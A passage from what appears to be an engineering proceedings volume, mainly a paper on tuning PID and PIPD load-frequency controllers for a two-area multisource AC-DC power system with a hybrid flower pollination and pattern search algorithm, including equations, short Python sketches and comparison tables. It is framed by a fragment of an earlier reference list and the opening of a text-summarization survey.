10.1109/ICMLA.2019.00213.
10. Liu, A., Lu, J., & Zhang, G. (2020). Diverse instance-weighting ensemble based on region
drift disagreement for concept drift adaptation. IEEE Transactions on Neural Networks and
Learning Systems,. https://doi.org/10.1109/TNNLS.2020.2978523.
11. Yang, Z., Al-Dahidi, S., Baraldi, P., Zio, E., & Montelatici, L. (2020). A novel concept drift
detection method for incremental learning in nonstationary environments. IEEE Transactions
on Neural Networks and Learning Systems, 31(1), 309–320. https://doi.org/10.1109/TNNLS.
2019.2900956.
12. Iwashita, A. S., de Albuquerque, V. H. C., & Papa, J. P. (2019). Learning concept drift with
ensembles of optimum-path forest-based classifiers. Future Generation Computer Systems, 95,
198–211.
13. Zhou, X., Lo Faro, W., Zhang, X., & Arvapally, R. S. (2019). A framework to monitor machine
learning systems using concept drift detection. In W. Abramowicz & R. Corchuelo (Eds.),
Business Information Systems (BIS 2019), Lecture Notes in Business Information Processing
(Vol. 353). Cham: Springer.
14. Song, Y., Lu, J., Lu, H., & Zhang, G. (2020). Fuzzy clustering-based adaptive regression for
drifting data streams. IEEE Transactions on Fuzzy Systems, 28(3), 544–557. https://doi.org/
10.1109/TFUZZ.2019.2910714.
15. Rutkowska, D., & Rutkowski, L. (2019). On the hermite series-based generalized regression
neural networks for stream data mining. In T. Gedeon, K. Wong, M. Lee (Eds.), Neural Infor-
mation Processing. ICONIP. (2019). Lecture Notes in Computer Science (Vol. 11955). Cham:
Springer.
16. Abdualrhman, M. A. A., & Padma, M. C. (2020). Deterministic Concept drift detection in
ensemble classifier based data stream classification process. IJGHPC, 11(1), 29–48. https://
doi.org/10.4018/IJGHPC.2019010103.
17. Abdualrhman, M. A. A., & Padma, M. C. (2019). CD2A: Concept drift detection approach
toward imbalanced data stream. In V. Sridhar, M. Padma, & K. Rao (Eds.), Emerging Research
in Electronics, Computer Science and Technology Lecture Notes in Electrical Engineering
(Vol. 545). Singapore: Springer.
18. McConville, R., et al. (2018). Online heart rate prediction using acceleration from a wrist worn
wearable. arXiv:1807.04667.
19. Zhang, L., Zhao, J., & Li, W. Online and unsupervised anomaly detection for streaming data
using an array of sliding windows and PDDs. In IEEE Transactions on Cybernetics. https://
doi.org/10.1109/TCYB.2019.2935066.
20. Yu, S., et al. (2019). Concept drift detection and adaptation with hierarchical hypothesis testing.
arXiv:1707.07821.
21. Albuquerque, R. A. S., Costa, A. F. J., Miranda dos Santos, E., Sabourin, R., & Giusti, R.
(2019). A decision-based dynamic ensemble selection method for concept drift 2019. In: IEEE
31st International Conference on Tools with Artificial Intelligence (ICTAI) (pp. 1132–1139)
Portland, OR, USA. https://doi.org/10.1109/ICTAI.2019.00158.
22. Li, Z., Huang, W., Xiong, Y., Ren, S., & Zhu, T. (2020). Incremental learning imbalanced
data streams with concept drift: The dynamic updated ensemble algorithm. Knowledge-Based
Systems, 195.
23. Raj, S., Ray, K. C., & Shankar, O. (2018). Development of robust, fast and efficient QRS
complex detector: A methodological review. Australasian Physical & Engineering Sciences in
Medicine, 41, 581–600. https://doi.org/10.1007/s13246-018-0670-7.

24. Jain, S., Kumar, A., & Bajaj, V. (2016). Technique for QRS complex detection using particle
swarm optimization. IET Science, Measurement & Technology, 10(6), 626–636.
25. Venkatesan, C., Karthigaikumar, P., Paul, A., Satheeskumaran, S., & Kumar, R. (2018). ECG
signal preprocessing and SVM classifier-based abnormality detection in remote healthcare
applications. IEEE Access, 6, 9767–9773. https://doi.org/10.1109/ACCESS.2018.2794346.
26. Saurav, S., Malhotra, P., Vishnu, T. V., Gugulothu, N., Vig, L., Agarwal, P., & Shroff, G. (2018).
Online anomaly detection with concept drift adaptation using recurrent neural networks. In Pro-
ceedings of the ACM India Joint International Conference on Data Science and Management
of Data (CoDS-COMAD ’18). (pp. 78–87). New York, NY, USA.: Association for Computing
Machinery. https://doi.org/10.1145/3152494.3152501.
27. Steinberg, C., Philippon, F., Sanchez, M., et al. (2019). A novel wearable device for continuous
ambulatory ECG recording: proof of concept and assessment of signal quality. Biosensors
(Basel), 9(1):17. Published 2019 Jan 21. https://doi.org/10.3390/bios9010017.
28. Zuo, J., Zeitouni, K., & Taher, Y. (2019). ISETS: Incremental Shapelet Extraction from Time
Series Stream.
29. Sahmoud, S., & Topcuoglu, H. R. (2020). A general framework based on dynamic multi-
objective evolutionary algorithms for handling feature drifts on data streams. Future Generation
Computer Systems, 102, 42–52.
30. Duda, P., Jaworski, M., Cader, A., & Wang, L. (2020). On training deep neural networks using
a streaming approach. Journal of Artificial Intelligence and Soft Computing Research, 10(1),
15–26. https://doi.org/10.2478/jaiscr-2020-0002.
31. Fedotov, A. (2019). The concept of a new generation of electrocardiogram simulators. Mea-
surement Techniques, 61, https://doi.org/10.1007/s11018-019-01576-3.
32. Anugirba, K. (2019). ECG QRS complex detector for BSN using multiscale mathematical
morphology. Journal of the Gujarat Research Society, 21(14), 655–662.
33. Liu, C., et al. (2019). Signal quality assessment and lightweight QRS detection for wearable
ECG smartVest system. IEEE Internet of Things Journal, 6(2), 1363–1374. https://doi.org/10.
1109/JIOT.2018.2844090.
34. Erdenebayar, U., Kim, Y. J., Park, J.-U., Joo, E. Y., & Lee, K.-J. (2019). Deep learning
approaches for automatic detection of sleep apnea events from an electrocardiogram. Com-
puter Methods and Programs in Biomedicine, 180.
Tailoring the Controller Parameters
Using Hybrid Flower Pollination
Algorithm for Performance
Enhancement of Multisource Two Area
Power System

Megha Khatri, Pankaj Dahiya, and S. Hareesh Reddy

Abstract The stability of the multisource interactive power generation system can
be achieved by accurately tuning the controller parameters, which regulates the
power flow in the system. This article is dedicated to a novel hybrid flower pollina-
tion algorithm applicable to regulate the proportional-integral-derivative (PID) and
proportional-integral cascaded with proportional-derivative (PIPD) controller struc-
tures integrated in the interlinked multisource two area AC-DC power systems. The
supremacy of the projected algorithm is investigated with respect to the range of
techniques discussed in the literature. The comparison parameters taken into consid-
eration are variations in tie-line power, area frequency along with the reduction in
controller errors to achieve better system stability.

Keywords Hybrid flower pollination algorithm · PID controller · PIPD


controller · Multisource two area systems · AC-DC interconnected power system

1 Introduction

Electrical power generated from diverse sources such as hydro, thermal, gas, solar and wind power plants serves the consumers. However, it is a matter of fact that the interconnection of these (AC-DC) power plants reduces the power quality, stability and consistency of the power system. With a view to overcoming the power crisis, the
power flow controller of the interlinked systems must be optimally controlled to
limit the losses in the system. Also, it is essential to ensure that the interlinked
system is working on the nominal values of system parameters such as voltage,
phase and frequency for its successful operation. It is also important to quantify the

M. Khatri (B) · S. H. Reddy


School of Electronics and Electrical Engineering, Lovely Professional University, Jalandhar,
Punjab 144411, India
e-mail: megha.25035@lpu.co.in
P. Dahiya
Department of Electronics and Communication Engineering, Delhi Technological University,
New Delhi, India


power distribution to satisfy the load demand under balanced conditions. However,
frequent change in power requirement by load affects the area frequency and power
in the common line connecting multiple energy sources areas.
Hence, the intention here is to keep the frequency and power of the interdependent
system within the limits and make efforts to diminish the area control error to achieve
stability. Various studies on load frequency control of single/two/multiple area networks have been developed and implemented over the last few decades. Recently, the studies have been extended to the implementation of bio-inspired algorithms for the optimization of controller parameters. Some of the popular algorithms presented by researchers to improve the controller response are the cuckoo search algorithm (CSA) employed for two-area interdependent energy resources [1], the firefly algorithm (FA) utilized for multi-area systems [2], the genetic algorithm (GA) for the automatic generation control system [3], particle swarm optimization (PSO) [4], the teaching–learning-based optimization algorithm [5, 6], the bacterial foraging algorithm (BF) [7], the artificial immune system (AIS) [8], the flower pollination algorithm (FPA) [9, 10], etc. It has been observed that due to nonlinearities/nonlinear loads, the system response deteriorates in terms of parameters such as high peak overshoot, large settling time, and sustained oscillations.
Thus, this paper contributes to tuning the PID and PIPD controller variables for the multisource connected areas. The controller gains are refined with the proffered algorithm under varying load conditions, and its performance is compared to recently published algorithms [11, 12].
The work is structured as follows: Sect. 2 illustrates the mathematical blueprint of the multisource two-area interdependent system along with its parameters. Section 3 presents the enhanced version of the PID/PIPD controllers, whose gains are optimized using the hybrid flower pollination algorithm. Afterward, a comparison of the proposed algorithm is carried out and its performance is observed. In Sect. 4, the conclusion about the proffered algorithm is drawn.

2 System Under Investigation

The system under examination is an interdependent multisource AC-DC system encompassing hydro, thermal and gas power production units as AC power sources
and solar as DC power source as shown in Fig. 1. The control errors of multisource
systems are U H1 , U H2 ; U T1 , U T2 ; and U G1 , U G2, respectively, while the area control
error is CE1 and CE2 as mentioned. The governor speed regulation parameters of
sources are RH1 , RH2 , RT1 , RT2 , RG1 , RG2 , and B1 , B2 are the frequency bias param-
eters. The frequency variations Δf1, Δf2 (in Hz) and the variation in tie-line power ΔPtie (in per unit) of the two connected areas may be observed in the case of load variations.
The involved variables of hydro, thermal and gas power producing units are K H ,
K T and K G , where the time constant (in seconds) of thermal speed governors is T G1
T G2 , steam turbines are T T1 T T2 , reheat time constant T R1 , T R2 professed initial
time of water inside penstock of hydro unit is T W , the servo time constant of hydro

Fig. 1 Two-area multisource AC-DC power system

plant speed governor is T GH1 T GH2 , turbine speed governor reset time is T RS1 , T RS2 ,
transient droop time constant of the hydro turbine is T RH1 T RH2 , the lead time constant
of the gas turbine speed governor is X C , the lag time constant of gas speed turbine
is Y C , the gas turbine valve position is cg , the gas turbine valve position constant is
bg , gas turbine combustion reaction time hindrance T CR , the discharge volume-time
constant of gas turbine compressor is T CD , power system gain is K PS , power system
time constant is T PS , and the incremental load changes are ΔPD1 , ΔPD2 . The DC power
source has the gain K DS , the power system time constant T DS .
An area control error of the presented system is given below

CE1,2 = B1,2 · Δf1,2 + ΔPtie    (1)



Each component of the area has been analyzed in frequency domain and presented
in transfer function form. The thermal speed governing system has two inputs: the
reference UT1,2 and Δf1,2, and the output obtained is given in Eq. (2):

ΔPT1,2 = UT1,2 − (1/RT1,2) · Δf1,2    (2)

Similarly, for the hydro and gas power units, the outputs obtained are given in Eqs. (3) and (4), respectively:

ΔPH1,2 = UH1,2 − (1/RH1,2) · Δf1,2    (3)

ΔPG1,2 = UG1,2 − (1/RG1,2) · Δf1,2    (4)

The incremental frequency change of the system is given in Eq. (5):

Δf1,2 = GP1,2(s) [(ΔPH1,2 + ΔPT1,2 + ΔPG1,2 + ΔPDS1,2) − ΔPD1,2]    (5)

where GP1,2(s) = KPS1,2 / (1 + s TPS1,2).
The performance of the complete system can be judged on system response parameters such as peak undershoot, peak overshoot, settling time, and errors. The controller parameters are regulated with respect to the specified error [13]. Thus, the integral time multiplied absolute error (ITAE) is chosen as the objective function to refine the PID/PIPD gains; it reflects the variations and helps settle the system faster than the other methods presented in the literature [14]. Therefore, ITAE is adopted as the objective function, as presented in Eq. (6):
ITAE is presented in Eq. (6)

J = ITAE = ∫0^tsim (|Δf1| + |Δf2| + |ΔPtie|) · t · dt    (6)
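A minimal sketch of evaluating this ITAE criterion numerically, assuming the simulation returns sampled deviations Δf1(t), Δf2(t) and ΔPtie(t); the trapezoidal integration is an implementation choice, not specified in the paper.

```python
import numpy as np

def itae(t, d_f1, d_f2, d_ptie):
    """Numerical evaluation of Eq. (6): time-weighted integral of absolute errors."""
    err = (np.abs(d_f1) + np.abs(d_f2) + np.abs(d_ptie)) * t
    return np.trapz(err, t)

# t = np.linspace(0, 40, 4001)        # 40 s horizon, as in the response plots
# j = itae(t, d_f1, d_f2, d_ptie)     # deviation signals obtained from the simulation
```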

The transfer function model of the multisource interconnected AC-DC tie-line system involves the thermal, hydro, gas and solar power production units shown in Fig. 1. The controller outputs for each unit of the power plant are UT, UH and UG, with PID parameters, i.e., the proportional (Kp1), integral (KI1) and derivative (Kd1) constants, respectively. Moreover, the PIPD structure with Kp1, KI1, Kd1 and an added control parameter, i.e., the proportional constant (Kp2), is expressed in Eqs. (7)–(9) below.
For the optimization of these parameters, the hybrid flower pollination algorithm with pattern search (hFPA-PS) is proffered for the interconnected AC units and the AC-DC tied power units.

UH = KP1·CE1 + KI1·∫CE1 dt + KP2·CE1 + Kd1·(dCE1/dt)    (7)

UT = KP1·CE1 + KI1·∫CE1 dt + KP2·CE1 + Kd1·(dCE1/dt)    (8)

UG = KP1·CE1 + KI1·∫CE1 dt + KP2·CE1 + Kd1·(dCE1/dt)    (9)
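For illustration, the controller output written in Eqs. (7)–(9) can be evaluated in discrete time as below; this is a sketch assuming a fixed sampling step and a backward-difference derivative, not the simulation model used by the authors.

```python
class PIPDController:
    """Discrete-time evaluation of U = Kp1*CE + KI1*integral(CE) + Kp2*CE + Kd1*dCE/dt."""

    def __init__(self, kp1, ki1, kp2, kd1, dt):
        self.kp1, self.ki1, self.kp2, self.kd1, self.dt = kp1, ki1, kp2, kd1, dt
        self.integral = 0.0   # running approximation of the integral term
        self.prev_ce = 0.0    # previous control-error sample for the derivative

    def step(self, ce):
        self.integral += ce * self.dt                # rectangular-rule integration
        derivative = (ce - self.prev_ce) / self.dt   # backward-difference derivative
        self.prev_ce = ce
        return (self.kp1 * ce + self.ki1 * self.integral
                + self.kp2 * ce + self.kd1 * derivative)

# Thermal-unit PIPD gains from Table 1 (dt = 0.01 s is an assumed sampling step):
# u_thermal = PIPDController(kp1=2.8337, ki1=1.2939, kp2=1.3327, kd1=1.2421, dt=0.01)
# u = u_thermal.step(ce)   # ce is the area control error CE1 at the current sample
```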
For multi-objective optimization problems, the flower pollination algorithm rules were formulated in [14]. Plants propagate their species through pollination by transporting pollen from one flower to another for reproduction. If the pollinators are birds, animals, or insects, the pollination is biotic; otherwise, the pollinators can be abiotic, such as wind or water [15].
Biotic pollinators can travel long distances; this falls under the category of global pollination, exhibits Lévy flight behavior [16], and is mathematically formulated using the Lévy distribution to obtain random solutions in the conventional flower pollination algorithm [17].
On the other hand, pollination by abiotic pollinators, called local pollination, can be mathematically formulated for effective convergence of solutions using the pattern search algorithm (PS) [18]. To decide whether the pollination is global or local, the switch probability (ρ) takes values in the range 0–1. The mathematical expression of global pollination using Lévy flight behavior is
 
Xi^(t+1) = Xi^t + γ L(ρ) (G* − Xi^t)    (10)

where Xi^t = pollen "i" at iteration t,
G* = present best solution of the selected population,
Xi^(t+1) = solution for iteration t + 1,
γ = scaling factor used to update the step size,
L(ρ) = Lévy distribution [16, 17], presented below:

L ∼ (ρ τ(ρ) sin(πρ/2) / π) · (1 / s^(1+ρ))    (11)

where τ(ρ) is the standard gamma function, and the distribution is applicable to large steps S > 0. When the random number is lower than the switching probability (p), local pollination takes place, mathematically expressed as
 
Xi^(t+1) = Xi^t + ε (Xj^t − Xk^t)    (12)

where Xj^t and Xk^t are pollen from different flowers of the same species, which ensures consistency of the outcome in the event of local pollination. The step size can be drawn using Eq. (13). Following the Gaussian distribution, A and B are random numbers, and the samples can be gathered from a standard Gaussian distribution function with variance σ² and zero mean.


S = A / |B|^(1/ρ),   A ∼ N(0, σ²),   B ∼ N(0, 1)    (13)

The variance is calculated as

σ² = [ τ(1 + ρ) sin(πρ/2) / ( ρ τ((1 + ρ)/2) · 2^((ρ−1)/2) ) ]^(1/ρ)    (14)
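A sketch of drawing the Lévy-distributed step of Eqs. (13)–(14) and applying the global-pollination update of Eq. (10); the scaling factor value and the population handling are assumptions for illustration, and the normal draw uses the square root of σ² because NumPy expects a standard deviation.

```python
import math
import numpy as np

def levy_step(rho, size):
    """Draw Lévy-distributed steps via Eqs. (13)-(14): S = A / |B|**(1/rho)."""
    # Eq. (14): variance of A (the gamma function is written as tau in the text).
    sigma2 = (math.gamma(1 + rho) * math.sin(math.pi * rho / 2)
              / (rho * math.gamma((1 + rho) / 2) * 2 ** ((rho - 1) / 2))) ** (1 / rho)
    a = np.random.normal(0.0, np.sqrt(sigma2), size)   # A ~ N(0, sigma^2)
    b = np.random.normal(0.0, 1.0, size)               # B ~ N(0, 1)
    return a / np.abs(b) ** (1.0 / rho)

def global_pollination(x_i, g_best, rho=1.5, gamma=0.1):
    """Eq. (10): X_i(t+1) = X_i(t) + gamma * L(rho) * (G* - X_i(t))."""
    return x_i + gamma * levy_step(rho, np.shape(x_i)) * (g_best - x_i)

# Example: move one candidate gain vector toward the current best solution.
# x_new = global_pollination(np.array([2.0, 1.5, 0.5]),
#                            g_best=np.array([2.7, 2.7, 2.7]))
```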

Flowers that are closer have a fair chance of being fertilized through local pollination, while distant flowers are more likely to be pollinated globally. Therefore, the switch probability is used for switching between local and global pollination, and it is to some extent biased toward local pollination [19]. The pattern search algorithm is a derivative-free method for resolving parameter-tuning problems. It is based on the computation of a sequence of points that progressively approach the optimal solution by creating a mesh.
The mesh is a collection of points around the starting point defined by the FPA. The chosen point, i.e., the current best, is multiplied by a scalar set of vectors known as the pattern to create the mesh, and the point with the best objective function value becomes the current point for the subsequent iteration. For the first iteration, the mesh size is initialized with scalar = 1, and then the direction vectors are initialized [20, 21].
The FPA decides the initial point X0, and the direction vectors are added to it to compute the objective function, whose value is compared with that at the initial point X0. If the objective function reaches a smaller value, then that mesh point becomes X1 [22, 23]. Therefore, based on the success in finding a smaller objective function value, in the second iteration the mesh size is multiplied by higher or lower multiplier factors to obtain the optimal solution. Thus, the feedback gain is optimized in the presented work.
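A minimal sketch of the polling step described above, assuming coordinate directions as the pattern and expand/contract factors of 2 and 0.5 (the text only says "higher and lower multiplier factors"); the actual toolbox implementation used by the authors may differ.

```python
import numpy as np

def pattern_search(objective, x0, mesh=1.0, expand=2.0, contract=0.5,
                   tol=1e-6, max_iter=200):
    """Derivative-free local refinement around the best FPA solution x0."""
    x = np.asarray(x0, dtype=float)
    best = objective(x)
    directions = np.vstack([np.eye(len(x)), -np.eye(len(x))])  # the pattern
    for _ in range(max_iter):
        improved = False
        for d in directions:                 # poll the mesh points around x
            trial = x + mesh * d
            f = objective(trial)
            if f < best:
                x, best, improved = trial, f, True
                break
        mesh = mesh * expand if improved else mesh * contract
        if mesh < tol:
            break
    return x, best

# gains, itae_value = pattern_search(simulate_itae, x0=fpa_best)
# simulate_itae would run the system model and return the ITAE of Eq. (6).
```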

3 Testaments of Proposed Algorithm

The controller gains Kp, KI and Kd of PID, and Kp1, KI1, Kd1 and Kp2 of PIPD, for the multisource (six sources) two-area network are given in Table 1. Here, the system is interlinked through the AC tie-line only. For the optimized operation of the controllers using the hybrid flower pollination algorithm, the Lévy distribution factor is taken as 1.5, the number of iterations as 50, and the switching probability as 0.8.
The simulations are carried out with the controller parameters mentioned in Table 1. The algorithms implemented for the controller tuning are the differential evolution algorithm (DE) based PID, the hybrid stochastic fractal search combined

Table 1 PID controller gains of multisource two area AC tie-line units


Controller Parameters Thermal Hydro Gas
PID Kp 2.6791 1.9220 0.4782
KI 2.7396 −0.0495 2.2118
Kd 2.6978 0.9009 0.7612
PIPD K p1 2.8337 1.5809 0.5525
K I1 1.2939 2.4750 2.4382
K p2 1.3327 −0.8609 2.0637
K d1 1.2421 0.8583 1.0752

pattern search technique (hSFS:PS) based PID, hybrid flower pollination algorithm
combined pattern search (hFPA:PS) method based PID and PIPD [20–22].
The performance comparison of the mentioned algorithms is done on the basis of the following indices: the objective function ITAE and the system frequency states (Δf1,2), i.e., peak overshoot (PO), peak undershoot (PU) and settling time (ST) for areas 1 and 2, respectively, together with the connected tie-line power, as represented in Table 2.
The obtained results of the proposed hFPA-PS:PIPD algorithm are validated by observing the frequency variations, which are decreased significantly compared to the other algorithms. It is also evident that the ITAE is minimized, and thus system stability and reliability are achieved.
Moreover, the response of the system can be observed graphically: Fig. 2 shows the change in area 1 frequency (Δf1). With the proposed algorithm for the PID and PIPD controllers, the system frequency reaches the steady state at a faster rate compared to the discussed methods. Figure 3 represents the variations in area 2 frequency (Δf2), and the response of the variation in tie-line power (ΔPtie) is shown in Fig. 4. By using the proffered method, losses can be reduced drastically and the system can be balanced in minimum time.

[Plot: Δf1 (Hz) versus time (s) over 0–40 s for DE:PID, hSFS-PS:PID, Proposed:PID and Proposed:PIPD]

Fig. 2 Comparison of frequency variations in area-1 incorporated with PID and PIPD controller

[Plot: Δf2 (Hz) versus time (s) over 0–40 s for DE:PID, hSFS-PS:PID, Proposed:PID and Proposed:PIPD]

Fig. 3 Comparison of frequency variations in area-2 incorporated with PID and PIPD controller

[Plot: ΔPtie (×10⁻³) versus time (s) over 0–40 s for DE:PID, hSFS-PS:PID, Proposed:PID and Proposed:PIPD]

Fig. 4 Comparative responses of the variations in tie-line power

Hence, the overall response of the proposed method for both controllers is superior. Table 2 illustrates the parameter variations associated with the proposed hFPA-PS:PIPD and the other possible combinations in an interdependent multisource power system connected through an AC tie-line. It is evident from Table 2 that the ITAE is minimized along with control of the area frequency and of the power flow in the connecting line. The settling time is also minimized with the application of the proffered algorithm for the PID and PIPD controller structures.
The tuned gains of PID and PIPD for the connected AC-DC line are presented in Table 3. The performance indices comparison for the considered system is given in Table 4, between the differential evolution-based DE:I, DE:PI and DE:PID and the proposed hFPA-PS:I, hFPA-PS:PI, hFPA-PS:PID and hFPA-PS:PIPD. The following indices, i.e., ITAE, PO (Δf1,2), PU (Δf1,2) and ST of area 1, area 2, and the power variation in the connecting line, are presented to analyze the AC-DC interdependent system via the tie-line. Again, the performance of hFPA-PS:PIPD is found to be better in terms of minimizing all these parameters with respect to the other combinations. In Fig. 5a and b, the changes in frequency can be observed; they show that the area frequencies in the case of the AC-DC tie-line take more time to settle down than in the system with only the

Table 2 Performance indicators of system with AC tie-line


Parameters          hFPA-PS:PIPD    hFPA-PS:PID    DE:PID [11]    hSFS-PS:PID [12]
J(ITAE)             0.2357          0.2956         1.2014         0.3797
PU(Δf1) (Hz)        −0.0270         −0.0312        −0.0532        −0.0428
PU(Δf2) (Hz)        −0.0130         −0.0183        −0.0444        −0.0286
PU(ΔPtie) (MW)      −0.0036         −0.0049        −0.0096        −0.0068
PO(Δf1) (Hz)        0.0013          0.0063         0.0041         0.0082
PO(Δf2) (Hz)        5.0724 × 10⁻⁵   0.0039         0.0016         0.0045
PO(ΔPtie) (MW)      3.9864 × 10⁻⁵   4.8537 × 10⁻⁴  3.8701 × 10⁻⁴  5.0456 × 10⁻⁴
ST(Δf1) (s)         6.3354          6.8192         13.4735        9.4606
ST(Δf2) (s)         4.2163          12.3367        8.5014         11.4680
ST(ΔPtie) (s)       6.9590          15.6769        32.3995        17.4044

Table 3 Controller gains of multisource two area AC-DC tie-line power


Controller Parameters Thermal Hydro Gas
I KI 2.4150 0.5517 4.4726
PI KP 2.7582 0.3581 2.4522
KI 3.2027 2.2079 2.0923
PID KP 2.1671 2.5590 1.8428
KI 2.5180 0.3581 3.6550
KD 0.5056 1.9433 0.6924
PIPD K P1 0.7888 0.2938 0.4869
K I1 2.7662 0.4655 2.0637
K P2 2.7357 0.8622 3.1217
K D1 2.9701 −0.2398 1.6625

AC tie-line, as also seen for the power in Fig. 5c. However, the performance of the proffered algorithm is appreciable because of the system stability and reliability achieved.

Table 4 Performance indices with AC and DC tie-line


Parameters hFPA-PS:PIPD hFPA-PS:PID DE:PID hFPA-PS:PI DE:PI hFPA-PS:I DE:I
J(ITAE) 0.0994 0.2842 0.4485 0.3069 0.5592 0.3521 0.7461
PU(f 1) (Hz) −0.0167 −0.0282 −0.0235 −0.0243 −0.0254 −0.0256 −0.0256
PU(f 2) (Hz) −0.0031 −0.0064 −0.0051 −0.0048 −0.0056 −0.0056 −0.0061
PU(Ptie ) (MW) −0.0015 −0.0033 −0.0036 −0.0031 −0.0043 −0.0041 −0.0049
PO(f 1) (Hz) 7.8264 × 10–04 0.0042 7.6573 × 10–04 0.0012 0.0016 0.0029 0.0023
PO(f 2) (Hz) 4.7776 × 10–04 8.9423 × 10–04 0.0011 0.0012 0.0017 0.0020 0.0025
PO(Ptie ) (MW) 2.9272 × 10–04 7.5261 × 10–04 0.0011 9.5510 × 10–04 0.0017 0.0018 0.0026
ST (f 1) (s) 6.2999 7.1381 8.3945 8.0175 18.7322 14.5909 20.3814
ST (f 2) (s) 16.3699 19.9672 24.4975 20.1901 25.3626 20.5025 25.9861
ST (Ptie ) (s) 14.2893 13.8181 15.4232 13.2297 22.4630 18.5849 25.4340

[Panels a–c: time responses over 0–40 s comparing Proposed:I, DE:I, Proposed:PI, DE:PI, Proposed:PID, DE:PID and Proposed:PIPD; a Δf1 (Hz), b Δf2 (×10⁻³ Hz), c ΔPtie (×10⁻³)]

Fig. 5 Dynamic responses: frequency variations in a area-1, b area-2; c power variations in connected areas

4 Conclusions

The flower pollination algorithm gained popularity due to its global search capability, and the pattern search technique is beneficial for the local search. Therefore, an attempt is made to combine the two algorithms to obtain the optimal solution for common problems. A two-area multisource system is considered, where the areas are connected through AC-only and AC-DC power lines, respectively. The stability in tie-line power can also be observed from Figs. 4 and 5c. The frequency responses of the considered system, presented in Figs. 2, 3, 5a and 5b, show that the PIPD controller tuned with the proposed algorithm outperforms the other techniques. The error (ITAE) objective function obtained is also the minimum, i.e., 0.2357 and 0.0994, with the implementation of hFPA-PS:PIPD in the considered power systems, as presented in Tables 2 and 4, respectively. The discussed work can be extended to more complex conventional and deregulated interdependent systems, which can be integrated with available renewable energy resources, electric vehicle integration with the grid, and the impact of energy storage devices on interdependent systems.

References

1. Abdelaziz, A. Y., & Ali, E. S. (2015). Cuckoo search algorithm based load frequency controller
design for nonlinear interconnected power system. International Journal of Electrical Power
& Energy Systems, 73, 632–643.
2. Abd-Elazim, S. M., & Ali, E. S. (2018). Load frequency controller design of a two-area system
composing of PV grid and thermal generator via firefly algorithm. Neural Computing and
Applications, 30, 607–616.
3. Al-Othman, A. K., Ahmed, N. A., Al Sharidah, M. E., & Al Mekhaizim, H. A. (2013). A hybrid
real coded genetic algorithm–pattern search approach for selective harmonic elimination of
PWM AC/AC voltage controller. International Journal of Electrical Power & Energy Systems,
44, 123–133.
4. Panda, S., Mohanty, B., & Hota, P. K. (2013). Hybrid BFOA–PSO algorithm for auto-
matic generation control of linear and nonlinear interconnected power systems. Applied Soft
Computing, 13, 4718–4730.
5. Mohanty, B. (2015). TLBO optimized sliding mode controller for multi-area multi-source
nonlinear interconnected AGC system. International Journal of Electrical Power & Energy
Systems, 73, 872–881.
6. Rao, R. V., Savsani, V. J., & Vakharia, D. P. (2012). Teaching–learning-based optimization:
an optimization method for continuous non-linear large scale problems. Information Sciences,
183, 1–15.
7. Ali, E. S., & Abd-Elazim, S. M. (2011). Bacteria foraging optimization algorithm based load
frequency controller for interconnected power system. International Journal of Electrical
Power & Energy Systems, 33, 633–638.
8. Zhong, Y., & Zhang, L. (2011). An adaptive artificial immune network for supervised classi-
fication of multi-/hyper spectral remote sensing imagery. IEEE Transactions on Geo-science
and Remote Sensing, 50, 894–909.
9. Yang, X. S., Karamanoglu, M., & He, X. (2013). Multi-objective flower algorithm for
optimization. Procedia Computer Science, 18, 861–868.

10. Draa, A. (2015). On the performances of the flower pollination algorithm–qualitative and
quantitative analyses. Applied Soft Computing, 34, 349–371.
11. Mohanty, B., Panda, S., & Hota, P. K. (2014). Controller parameters tuning of differential
evolution algorithm and its application to load frequency control of multi-source power system.
International Journal of Electrical Power & Energy Systems, 54, 77–85.
12. Padhy, S., & Panda, S. (2017). A hybrid stochastic fractal search and pattern search technique
based cascade PI-PD controller for automatic generation control of multi-source power systems
in presence of plug in electric vehicles. CAAI Transactions on Intelligence Technology, 2, 12–25.
13. Khan, Z. A., Zafar, A., Javaid, S., Aslam, S., Rahim, M. H., Javaid, N. (2019). Hybrid
meta-heuristic optimization based home energy management system in smart grid. Journal
of Ambient Intelligence and Humanized Computing, 1–17.
14. Alyasseri, Z. A. A., Khader, A. T., Al-Betar, M. A., Awadallah, M. A., & Yang, X. S. (2018).
Variants of the flower pollination algorithm: A review. Nature-inspired algorithms and applied
optimization (Vol. 744, pp. 91–118). Cham: Springer.
15. Abdel-Raouf, O., & Abdel-Baset, M. (2014). A new hybrid flower pollination algorithm
for solving constrained global optimization problems. International Journal of Applied
Operational Research-An Open Access Journal, 4, 1–13.
16. Pavlyukevich, I. (2007). Lévy flights, non-local search and simulated annealing. Journal of
Computational Physics, 226, 1830–1844.
17. Sayed, S. A. F., Nabil, E., & Badr, A. (2016). A binary clonal flower pollination algorithm for
feature selection. Pattern Recognition Letters, 77, 21–27.
18. Abdel-Baset, M., & Hezam, I. (2016). A hybrid flower pollination algorithm for engineering
optimization problems. International Journal of Computer Applications, 140, 10–23.
19. Mahata, S., Saha, S. K., Kar, R., & Mandal, D. (2018). Optimal design of wideband digital
integrators and differentiators using hybrid flower pollination algorithm. Soft Computing, 22,
3757–3783.
20. Mohanty, B. (2020). Hybrid flower pollination and pattern search algorithm optimized sliding
mode controller for deregulated AGC system. Journal of Ambient Intelligence and Humanized
Computing, 11, 763–776.
21. Abdel-Basset, M., & Shawky, L. A. (2019). Flower pollination algorithm: A comprehensive
review. Artificial Intelligence Review, 52, 2533–2557.
22. Alweshah, M., Qadoura, M. A., Hammouri, A. I., Azmi M. S., & AlKhalaileh, S. (2020). Flower
pollination algorithm for solving classification problems. International Journal Advance Soft
Computer Application, 12
23. Tawhid, M. A., & Ibrahim, A. M. (2020). Hybrid binary particle swarm optimization and flower
pollination algorithm based on rough set approach for feature selection problem. In Nature-
inspired computation in data mining and machine learning, (pp. 249–273).
Automatic Extractive Summarization
for English Text: A Brief Survey

Sunil Dhankhar and Mukesh Kumar Gupta

Abstract In recent years, due to the popularity of the Internet, digital documents are growing at an exponential rate on the Web. To save time and quickly learn about the document(s), a text summarization system that produces a summary automatically from the source document(s) is required, because manual text summarization takes time, effort, and cost. A summary contains key phrases and other related essential text material with no alteration of the key information and the general context of the source document(s). The text summarization effort began in 1958, and researchers continue to try to improve text summaries. The summarization process is either extractive or abstractive. Extractive text summarization extracts the most appropriate sentences, phrases, or words from the text/document(s) and then incorporates them in the summary, while an abstractive text summarization system produces a summary with phrases other than those in the input text/document(s). This review paper describes preprocessing, features, methods, evaluations, and future directions in extractive text summarization research. This study describes the advantages and shortcomings of each method, compares them using precision, recall, and F-score, and finds that deep learning-based methods produce excellent results when 